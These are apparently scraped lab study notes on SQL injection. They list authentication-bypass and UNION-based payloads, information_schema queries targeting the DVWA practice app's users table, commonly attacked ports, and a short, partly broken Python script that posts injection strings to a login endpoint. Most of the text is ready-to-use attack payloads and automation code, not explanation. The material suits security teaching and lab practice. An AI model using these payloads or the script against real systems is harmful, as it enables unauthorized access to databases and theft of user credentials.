select * from users;
select idx,id_param from users;
select id_param from users where id_param='admin
select id_param from users where id_param='1' or '1'='1
admin > 1' or '1'='1
Insert, Update, Delete
insert into ...
update ... set ...
delete from ...
Common SQL Injection Payloads
1' or '1'='1
1' ORDER BY 1#
1' ORDER BY 2#
1' ORDER BY 3# (X)
1' UNION SELECT name,pw from users#
1' UNION SELECT 1,2#
1' UNION SELECT 1,2,3# (X)
Information Schema Queries
'UNION SELECT schema_name,2 from information_schema.schemata#
'UNION SELECT table_name,2 from information_schema.tables where table_schema='dvwa'#
'UNION SELECT column_name,2 from information_schema.columns where table_schema='dvwa' and table_name='users'#
'UNION SELECT user,password from users#
Ports Commonly Used in Web Attacks
21, 22, 23, 25, 110, 143, 3306
80, 443
Automation Code Example
Python Script for SQL Injection
import requests
def sql(self):
result = []
target = "http://web2.st.kr/auth/login2_ok.php"
sql_in = [
"1' or '1'='1",
"' UNION SELECT schema_name,2 from information_schema.schemata#",
"",
"",
""
]
for sql in sql_in:
payload = {"id_param": sql, "pw_param": sql}
print(sql)
response = requests.post(target, payload)
print(response.text)
if response.text == "OK":
print("SQL OK")
Ready to Leave?
Select "Logout" below if you are ready to end your current session.
